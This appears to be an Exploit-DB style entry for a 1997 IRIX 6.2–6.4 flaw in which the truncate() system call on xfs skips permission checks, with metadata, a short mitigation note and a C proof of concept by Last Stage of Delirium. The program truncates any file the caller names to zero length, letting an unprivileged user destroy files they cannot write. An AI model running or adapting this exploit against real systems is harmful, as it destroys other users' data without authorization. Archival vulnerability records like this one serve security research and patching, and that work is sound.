vendor: Operating System
by: LAST STAGE OF DELIRIUM
CVSS: 7.2 HIGH
Privilege Escalation
CWE: 264
Product Name: Operating System
Affected Version From: 6.2
Affected Version To: 6.4
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
1997

Truncate System Call Vulnerability

The truncate() system call on a number of versions of the IRIX operating system (with the xfs file system) does not properly check permissions before truncating a file, making it possible for unprivileged users to damage files to which they would otherwise not have write access.

Mitigation:

Apply the vendor patch (listed above as available) so that the truncate() system call checks the caller's write permission on the file before truncating it.
Source

Exploit-DB raw data:

/*
source: https://www.securityfocus.com/bid/1540/info

The truncate() system call on a number of versions of the IRIX operating system (with the xfs file system) does not properly check permissions before truncating a file, making it possible for unprivileged users to damage files to which they would otherwise not have write access. Although only versions 6.2, 6.3, and 6.4 are listed as vulnerable, other versions may exhibit this behaviour as well.
*/

/*## copyright LAST STAGE OF DELIRIUM feb 1997 poland        *://lsd-pl.net/ #*/
/*## truncate                                                                #*/

/*   truncates any file on a xfs filesystem                                   */

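#include <stdio.h>   /* printf, perror */
#include <stdlib.h>  /* exit */
#include <unistd.h>  /* truncate */

int main(int argc,char **argv){
    printf("copyright LAST STAGE OF DELIRIUM feb 1997 poland   //lsd-pl.net\n");
    printf("truncate for irix 6.2 6.3 6.4 IP:all\n\n");

    if(argc!=2){
        printf("usage: %s file\n",argv[0]);
        exit(-1);
    }

    /* truncate the named file to length 0; the affected kernels do not
       check the caller's write permission on xfs before doing so */
    if(!truncate(argv[1],0)) printf("file %s truncated\n",argv[1]);
    else perror("error");
    return 0;
}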